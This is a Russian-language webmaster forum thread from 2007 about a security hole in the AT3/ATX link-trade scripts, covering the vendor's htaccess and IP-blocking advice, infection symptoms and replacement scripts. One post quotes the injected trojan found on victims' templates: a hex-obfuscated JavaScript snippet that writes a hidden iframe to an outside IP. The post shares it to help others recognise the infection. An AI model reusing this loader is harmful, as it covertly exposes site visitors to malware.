Master-X
Форум | Новости | Статьи
Главная » Форум » CJs » 
Тема: Новая дыра в АTL
цитата
07/12/07 в 20:56
 Nick Cave
[Virus] уже написал в хитботчиках, но может не все заметили:

Список хитботчиков 4

Сегодня в заголовке АТЛ (на входе в админку) появилась новость о
найденой дырке и рекомендация закрыть x2.cgi в htaccess-e от
доступа с других ИП.

Обещают выпустить апдейт в ближайшем времени.

Правда на сайте arrowscripts чето пока этой новости я не нашел.
цитата
07/12/07 в 22:05
 Kitaa
Вот еще;
http://www.askdamagex.com/t21776-we-need-to-talk-security-now.html

Походу очень много народу пострадало.
цитата
07/12/07 в 22:55
 Benny
блин ну че за криворукие программеры!
в атх трейд по групам 3 месяц делают, да еще и дыры постоянно появляются! icon_evil.gif

продам 2 копии атх icon_smile.gif

зы: не, пока не буду продавать..
цитата
08/12/07 в 00:00
 Ziegfrid
А симптоматика то какая? На что внимание обратить?

Последний раз редактировалось: Ziegfrid (08/12/07 в 00:20), всего редактировалось 1 раз
цитата
08/12/07 в 00:13
 X-dream
Цитата:
A security issue has been detected and fixed, new build is on its way.
In the mean time, use htaccess to limit access to the file
cgi-bin/at3/x/x2.cgi to only your IP and blacklist IPs 208.53.158.26 and 69.93.211.234


пи*дец, вот они зае*али... опять надо будет все скрипты обновлять icon_sad.gif
цитата
08/12/07 в 00:16
 Benny
ладно ат3, он фришный..
но пилять, атх, купить за 400баков и там трейд по групам не работает - это пипец..

зы: в атх тоже дыру нашли icon_sad.gif
цитата
08/12/07 в 01:03
 Kitaa
Ziegfrid писал:
А симптоматика то какая? На что внимание обратить?

Он троя весит такого

Код:

<script> var s='3C696672616D65207372633D22687474703A2F2F3230332 E3132312E36392E392F65782F7374617469632E70687022207 7696474683D32206865696768743D32207374796C653D22646 973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} document.write(unescape(o)); </script>


и еще создает файл backup.php пустой.

Я вчера эту гадость у себя находил.

p.s. думаю трейд скрипт надо другой ставить какой посоветуете АТС?
цитата
08/12/07 в 01:18
 Ziegfrid
Kitaa писал:


p.s. думаю трейд скрипт надо другой ставить какой посоветуете АТС?

АТС смысла нет ставить. Скоро появится 1.7 версия. Щас активно тестируется. Вот поэтому пока ставлю ФТТ. Кстати пока скрипт показал себя с хорошей стороны (да и после ат3 очень легко с ним, потому как много похожего, хотя есть еще некоторые полезные вещи). Но все равно жду 1.7 АТС.
цитата
08/12/07 в 01:35
 awm_mark
нахрен снес ат3 со всех сиджев, недавно
цитата
08/12/07 в 01:36
 Ziegfrid
awm_mark писал:
нахрен снес ат3 со всех сиджев, недавно

Оффтопик: Что поставил?
цитата
08/12/07 в 01:41
 Benny
хм.. backup.php пустой находил в корне домена, а вот троя нет вроде нигде. куда они его вешают? на морду или в топ?

может спасло то, что доступ к фтп закрыт у меня..
цитата
08/12/07 в 02:02
 Kitaa
У меня по вешали на темплейт, на страничку для линк трейда и на фрихи которые были на данных сайтах. Судя по логам фтп к нему не прикосались.

p.s. права на темплейт какие стоят? может если 444 то это спасло.
цитата
08/12/07 в 02:09
 Benny
может через SSH?
он уменя тоже закрыт.
цитата
08/12/07 в 04:09
 awm_mark
чаще всего вешается когда на вирте хост (ну или для дедика доступ к 1 фтп достаточно, межсайтовый скр пропускаю, не поймут тут)
просто некоторые скрипты требуют установки 777 на корень, при этом вы открываете доступ к своим страницам любому желающему
цитата
08/12/07 в 12:59
 Stek
насколько понимаю, эта дыра только если скрипт может писать в директорию вэб сайта.
цитата
08/12/07 в 17:01
 Teval
мне в темллейт топлиста ат3 вешали
цитата
08/12/07 в 18:45
 supphosting.com
Писать можно во все файлы/папки где это разрешено пользователю от которых выполняется cgi-bin.
цитата
08/12/07 в 19:29
 sonata
awm_mark писал:
нахрен снес ат3 со всех сиджев, недавно


После того как увидел, что разработчик не залатав дыру в текущем стал делать очередную новогоднюю версию со скидками - думаю что тоже буду сносить.
цитата
08/12/07 в 20:13
 Figura
16 билд уже готов. Идем качать icon_smile.gif
цитата
08/12/07 в 20:36
 bullet2
Какие файлы дистрибутива надо переписать поверх старых, чтобы не затереть базу трейдеров и топлистов, и втоже время все работало?
цитата
08/12/07 в 20:47
 Figura
там патч скачай, и сверху его заливай, ниче не сотрется
цитата
09/12/07 в 00:02
 kazantipman
опасна ли дыра если формы закрыты?
цитата
09/12/07 в 00:07
 Benny
когда появился backup.php в корне, все формы были закрыты.
поэтому палагаю, что опасно.
цитата
09/12/07 в 02:00
 allendale
я хоть и не пострадал (у меня /x/ доступна только по http auth), но всё равно обиделся и пошёл купил 10 версий tradeexpert. во первых дешевле, во вторых надеюсь он менее распространён и будет меньше дыр находиться...
цитата
09/12/07 в 02:01
 Danilax
во а я тогда на смарт подумал, месяц 2 назад тоже ламанули, так вот бекап в корне был для отвода глаз, ищи еще один, скорее всего он будет в ротаторе в бекап папке или где то там icon_smile.gif
Стр. 1, 2, 3  >  последняя »


Эта страница в полной версии